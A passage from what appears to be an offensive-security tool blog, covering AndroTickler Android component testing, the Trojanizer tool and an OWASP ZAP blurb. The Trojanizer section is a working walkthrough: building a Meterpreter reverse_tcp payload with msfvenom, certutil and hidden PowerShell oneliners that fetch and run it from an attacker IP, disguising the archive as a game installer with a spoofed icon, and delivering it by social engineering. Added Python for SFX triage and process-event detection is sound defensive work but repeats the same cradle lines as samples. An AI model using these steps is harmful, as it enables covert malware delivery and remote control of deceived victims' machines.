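            if exported_attr is not None:
                exported = exported_attr == "true"
            else:
                # No explicit attribute: an intent-filter implies exported for
                # activities, services and receivers. Providers default by target
                # SDK (true below API 17); treated as not exported here.
                exported = bool(filters) and tag != "provider"
            found.append({"type": tag, "name": name, "package": pkg,
                          "exported": exported, "filters": filters})
    return found


def tickle_commands(comp: Dict, extras: Optional[Dict[str, str]] = None,
                    as_root: bool = False) -> List[str]:
    """adb commands triggering one component with every action x scheme
    combination; extras is {name: type} and each gets a dummy value."""
    if comp["type"] not in AM_VERB:
        return []  # providers are queried with 'content query', not 'am'
    extra_flags = " ".join(f"{DUMMY[t][0]} {k} {DUMMY[t][1]}"
                           for k, t in (extras or {}).items() if t in DUMMY)
    base = f"am {AM_VERB[comp['type']]} -n {comp['package']}/{comp['name']}"
    combos: List[Tuple[Optional[str], Optional[str]]] = []
    for actions, schemes in comp["filters"] or [([], [])]:
        for action in actions or [None]:
            for scheme in schemes or [None]:
                combos.append((action, scheme))
    cmds = []
    for action, scheme in combos:
        parts = [base]
        if action:
            parts.append(f"-a {action}")
        if scheme:
            parts.append(f"-d {scheme}://tickle")
        if extra_flags:
            parts.append(extra_flags)
        cmd = " ".join(parts)
        cmds.append(f'adb shell su -c "{cmd}"' if as_root else f"adb shell {cmd}")
    return cmds


def plan(manifest_xml: str, exported_only: bool, extras=None) -> List[str]:
    """-exp: exported components only, normal privileges. Otherwise every component, as root."""
    return [c for comp in components(manifest_xml)
            if comp["exported"] or not exported_only
            for c in tickle_commands(comp, extras, as_root=not exported_only)]


if __name__ == "__main__":
    for cmd in plan(MANIFEST, exported_only=True, extras={"user_id": "int", "debug": "boolean"}):
        print(cmd)
```

The exported decision is the one that matters for scoping: a component that is exported only because of an implicit intent-filter is reachable by any app on the device, so the -exp run (no root) is the attacker-realistic one, and the root run shows what a privileged process or ADB-level attacker could additionally reach.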

Frida:
Frida should be installed on your host machine. Also the location of Frida server on the Android device should be added to Tickler.conf file in the Frida_server_path entry

Capture Arguments and return value
java -jar AndroTickler.jar -pkg <package> -frida vals <ClassName> <MethodName> <NumberOfArgs> [-reuse]
Displays the arguments and return value of this method (only primitive datatypes and String).
-reuse: for the vals and set options, AndroTickler creates/updates a Frida script with that functionality. You can modify the created script as you want; to run the modified script through AndroTickler, use the -reuse option so that it does not get overwritten.

Modify Arguments or Return Value
java -jar AndroTickler.jar -pkg <package> -frida set <ClassName> <MethodName> <NumberOfArgs> <NumberOfArgToModify> <newValue> [-reuse]
Sets argument number NumberOfArgToModify to newValue (only primitive datatypes and String). If NumberOfArgToModify > NumberOfArgs, the return value is set instead.

Run JS Frida script
java -jar AndroTickler.jar -pkg <package> -frida script <scriptPath>
Runs a frida JS script located at scriptPath on your host
Enumerate loaded classes:
java -jar AndroTickler.jar -pkg <package> -frida enum

Other Features

Debuggable version
java -jar AndroTickler.jar -pkg <package> -dbg
Creates a debuggable version of the app, which can be installed on the device and debugged using any external tool. AndroTickler ships with a keystore to sign the debuggable APK, but signing requires the jarsigner tool on the host.

Custom version
java -jar AndroTickler.jar -pkg <package> -apk <decompiledDirectory>
Builds an apk file from a directory, signs it and installs it.

Background Snapshots
java -jar AndroTickler.jar [-pkg <package>] [-bg|--bgSnapshots]
Copies the background snapshots taken by the device (works with and without -pkg option) to bgSnapshots subdirectory.

Copy files / directories
Copy Data storage directory:
java -jar AndroTickler.jar -pkg <package> -dataDir [dest]
Copies the data storage directory to DataDir. dest is the optional name of the destination directory, which will in any case be located in the transfers subdirectory.
Copy any file / directory:
java -jar AndroTickler.jar -pkg <package> -cp2host <source_path> [dest]
Copies files / directories from the Android device.
  • source_path is the absolute location of what you want to copy from the Android device
  • dest: optional name of the destination directory, which will in any case be located in the transfers subdirectory.
If dest is not given, the directory's name will be the timestamp of the transfer.

Screenshot
java -jar AndroTickler.jar [-pkg <package>] -screen
  • Captures the current screen of the device and saves it in the images subdirectory
  • Works with or without the package flag

Note
For the options that do not require -pkg option, their data will be saved at Tickler_Dir/NoPackage

Examples:
java -jar AndroTickler.jar -pkg <package> -t  -act -exp
Triggers exported activities
java -jar AndroTickler.jar -pkg <package> -t -prov -log
Queries all content providers and saves logcat messages until the tool stops execution
java -jar AndroTickler.jar -pkg <package> -t <component_name> 
Triggers the component, type of triggering depends on the type of the component





Tuesday, January 23, 2018

Trojanize Your Payload (WinRAR [SFX] Automatization) - Trojanizer


The Trojanizer tool uses WinRAR (SFX) to compress the two files supplied by the user and turns them into a self-extracting executable (.exe) archive. When the SFX archive is executed it runs both files (our payload and the legitimate application) at the same time.

To make the archive less suspicious to the target at execution time, Trojanizer tries to replace the default icon (.ico) of the SFX file with a user-selected one, and suppresses all SFX archive dialogs (Silent=1 | Overwrite=1).

Trojanizer does not build trojans, but from the target's perspective it replicates trojan behaviour
(execute the payload in the background while the legitimate application runs in the foreground).

DEPENDENCIES (backend applications)

Zenity (bash GUIs) | Wine (x86|x64) | WinRAR.exe (installed in Wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recommended to edit and set the option SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before running the tool for the first time.


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If 'SINGLE_EXEC=ON' is selected in the settings file, then Trojanizer will accept any kind of extension as input.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"

ADVANCED SETTINGS


Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configured before running the main tool (Trojanizer.sh).

-- Presetup advanced option
Trojanizer can be configured to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allows users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs on the target system. If active, Trojanizer will ask (zenity dialog) for the command to be executed.

-- single_file_execution
Consider the following scenario: you have a DLL payload that you need to execute upon extraction, but SFX archives cannot execute DLL files directly. This setting allows users to input a batch script (.bat) that is going to be used to execute the DLL payload. All that Trojanizer needs to do is instruct the SFX archive to extract both files and then execute the script.bat.

The default behavior of the single_file_execution switch is to compress the two files supplied by the user but execute only one of them at extraction time (the 2º file supplied will be executed).
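From the analyst's side, everything described in this section is visible in the SFX script block (the 'xsf.conf' comment stored in the archive, which WinRAR shows when the archive is opened): Setup=, Presetup=, Silent= and Overwrite= are the directives that make the archive run one or two programs without prompting. The following Python is added here as a triage illustration and is not part of the Trojanizer project. It parses such a script block and flags the combinations an analyst would want to see; the directive names are WinRAR's own, while the three sample blocks, the LOLBINS list and the scoring rules are this example's constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Directive names are WinRAR SFX script commands; the scoring below is this example's own.
# Built-in Windows binaries whose appearance in a launch line is worth a second look.
LOLBINS = ("cmd.exe", "certutil", "powershell", "mshta", "rundll32",
           "regsvr32", "wscript", "cscript", "bitsadmin")

# Constructed sample script blocks (the kind WinRAR shows when opening the archive).
SFX_TROJAN = """\
; constructed sample: both files launched after extraction (trojan behaviour)
Path=%TEMP%
Setup=payload.exe
Setup=AngryBirds.exe
Silent=1
Overwrite=1
"""

SFX_PRESETUP = """\
; constructed sample: command run before extraction, one decoy launched afterwards
Presetup=cmd.exe /c certutil -urlcache -split -f http://example.invalid/payload.exe %TEMP%\\payload.exe
Setup=AngryBirds.exe
Silent=1
Overwrite=1
TempMode
"""

SFX_BENIGN = """\
; constructed sample: ordinary installer, prompts the user, launches one program
Title=Example installer
Path=C:\\Program Files\\Example
Setup=setup.exe
"""

@dataclass
class SfxTriage:
    setups: list = field(default_factory=list)     # programs run after extraction
    presetups: list = field(default_factory=list)  # commands run before extraction
    silent: bool = False       # Silent=1 hides the start dialog, Silent=2 hides all dialogs
    overwrite: bool = False    # Overwrite=1 overwrites existing files without asking
    tempmode: bool = False     # TempMode extracts to a temporary dir and deletes it afterwards
    findings: list = field(default_factory=list)

def parse_sfx_script(text):
    """Parse the key=value lines of an SFX script block into an SfxTriage record."""
    t = SfxTriage()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):   # blank lines and comments
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if key == "setup":
            t.setups.append(value)
        elif key == "presetup":
            t.presetups.append(value)
        elif key == "silent":
            t.silent = value not in ("", "0")
        elif key == "overwrite":
            t.overwrite = value == "1"
        elif key == "tempmode":
            t.tempmode = True
    return t

def triage(text):
    """Return the parsed record with human-readable findings attached."""
    t = parse_sfx_script(text)
    if t.silent and t.overwrite:
        t.findings.append("Silent + Overwrite: extraction shows no prompts at all")
    if len(t.setups) > 1:
        t.findings.append("%d Setup lines: more than one program launched after extraction" % len(t.setups))
    for cmd in t.presetups:
        t.findings.append("Presetup runs before extraction: " + cmd)
    for cmd in t.presetups + t.setups:
        low = cmd.lower()
        if any(b in low for b in LOLBINS):
            t.findings.append("built-in Windows binary invoked: " + cmd)
        if re.search(r"https?://", low):
            t.findings.append("URL in launch command (remote download): " + cmd)
    return t

if __name__ == "__main__":
    for name, block in (("trojan", SFX_TROJAN), ("presetup", SFX_PRESETUP), ("benign", SFX_BENIGN)):
        print(name, triage(block).findings)
```

The benign block produces no findings, the two-Setup block produces two, and the Presetup block produces four; a real triage pipeline would feed the comment text extracted from the archive into `triage()` and route anything with a Presetup line or a URL to manual review.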

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries (see also: Windows oneliners to download a remote payload and execute arbitrary code).

The following exercise describes how to use the Trojanizer 'single_file_execution' and 'Presetup' advanced switches to drop (remote download) and execute a payload using 'certutil' or 'powershell' application-whitelisting-bypass oneliners.

1º - use metasploit to build our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listener, and send the sfx archive to the target using social engineering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the sfx archive is executed, it downloads payload.exe from our apache2 webserver to the target and executes it before extracting 'screenshot.png' and 'AngryBirds.exe' (the latter is executed to serve as the decoy).

The following oneliner uses the 'powershell (DownloadFile + start)' method to achieve the same as the previous 'certutil' exercise:
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The following oneliner uses the 'powershell (IEX + DownloadString)' method to achieve almost the same (payload.ps1 does not touch disk):
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
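The three oneliners above leave recognisable marks in process-creation telemetry (Sysmon event ID 1, or Windows Security event 4688 with command-line logging enabled): certutil called with -urlcache and a URL, PowerShell started with a hidden window plus a DownloadFile/DownloadString/IEX cradle, a shell interpreter spawned by a program running from Downloads or Temp, and processes launched from WinRAR's RarSFX<n> temporary extraction directory. The Python below is added here as a detection example and is not part of the page's tooling; the '|'-separated event format, the sample events, the paths and the rule names are this example's constructed assumptions.

```python
import re

# Constructed sample process-creation events (not real telemetry). One event per line:
# timestamp|parent_image|image|command_line
EVENTS = [
    "2018-01-27T10:00:01|C:\\Users\\u\\Downloads\\AngryBirds_installer.exe|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c certutil -urlcache -split -f http://example.invalid/payload.exe C:\\Users\\u\\AppData\\Local\\Temp\\payload.exe",
    "2018-01-27T10:00:02|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|"
    "certutil -urlcache -split -f http://example.invalid/payload.exe C:\\Users\\u\\AppData\\Local\\Temp\\payload.exe",
    "2018-01-27T10:00:03|C:\\Users\\u\\Downloads\\AngryBirds_installer.exe|C:\\Users\\u\\AppData\\Local\\Temp\\RarSFX0\\AngryBirds.exe|"
    "AngryBirds.exe",
    "2018-01-27T10:05:00|C:\\Users\\u\\Downloads\\Setup.exe|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c powershell.exe -w hidden -c IEX ((new-object net.webclient).downloadstring('http://example.invalid/p.ps1'))",
    "2018-01-27T11:00:00|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\certutil.exe|"
    "certutil -hashfile C:\\Users\\u\\Downloads\\image.iso SHA256",
    "2018-01-27T12:00:00|C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

# Script hosts and shells whose parent is worth checking.
SHELLS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# Directories an ordinary user can write to (lower-case, with surrounding backslashes).
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\desktop\\")

def basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()

def rules_for(parent, image, cmdline):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    low = cmdline.lower()
    # R1: certutil fetching over HTTP(S) -- the certutil oneliner.
    if "certutil" in low and "-urlcache" in low and re.search(r"https?://", low):
        hits.append("certutil_http_download")
    # R2: hidden-window PowerShell combined with a download cradle -- the two PowerShell oneliners.
    if "powershell" in low and re.search(r"-w(indowstyle)?\s+hidden", low) \
            and re.search(r"downloadfile|downloadstring|\biex\b|invoke-expression", low):
        hits.append("powershell_hidden_cradle")
    # R3: a shell interpreter whose parent executes from a user-writable directory
    #     (an SFX run from Downloads spawning cmd.exe for its Presetup command).
    if basename(image) in SHELLS and any(d in parent.lower() for d in USER_WRITABLE):
        hits.append("shell_from_user_writable_parent")
    # R4: parent or child running out of a WinRAR SFX temporary extraction dir (RarSFX<n>).
    if any(re.search(r"\\rarsfx\d+\\", p.lower()) for p in (parent, image)):
        hits.append("rarsfx_extraction_dir")
    return hits

def scan(events):
    """Run the rules over every event; return (timestamp, image basename, hits) for events that fired."""
    out = []
    for line in events:
        ts, parent, image, cmdline = line.split("|", 3)
        hits = rules_for(parent, image, cmdline)
        if hits:
            out.append((ts, basename(image), hits))
    return out

if __name__ == "__main__":
    for ts, image, hits in scan(EVENTS):
        print(ts, image, ", ".join(hits))
```

Four of the six constructed events fire; the legitimate certutil -hashfile call and the scheduled PowerShell script do not, which is the point of requiring the -urlcache/URL and hidden-window/cradle combinations rather than alerting on the binary name alone. R3 is deliberately broad and is best used as a correlation signal next to R1, R2 or R4 rather than as a stand-alone alert.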

DOWNLOAD/INSTALL
1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set file execution permissions
     cd trojanizer
     sudo chmod +x *.sh

3º - Configure the framework
     nano settings

4º - Run the main tool
     sudo ./Trojanizer.sh

Framework Screenshots

[screenshot] xsf.conf - execute both files upon extraction (trojan behavior)
[screenshot] xsf.conf - single_file_execution + Presetup (advanced options)
[screenshot] xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)
[screenshot] xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)
[screenshot] Final sfx archive with icon changed
[screenshot] Inside the sfx archive (open with winrar) - trojan behavior
[screenshot] Inside the sfx archive (open with winrar) - single_file_execution

Video tutorials

[video] Trojanizer - single_file_execution (not trojan behavior)
[video] Trojanizer - AVG anti-virus fake installer (trojan behavior)



Sunday, January 21, 2018

Penetration Testing Tool for Testing Web Applications - OWASP ZAP 2.7.0


The OWASP Zed Attack Proxy (ZAP) is one of the world's most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.

For general information about ZAP:
  • Home page - the official ZAP page on the OWASP wiki (includes a donate button;)
  • Twitter - official ZAP announcements (low volume)
  • Blog - official ZAP blog
  • Monthly Newsletters - ZAP news, tutorials, 3rd party tools and featured contributors
  • Swag! - official ZAP swag that you can buy, as well as all of the original artwork released under the CC License


Copyright © Offensive Sec Blog | Powered by OffensiveSec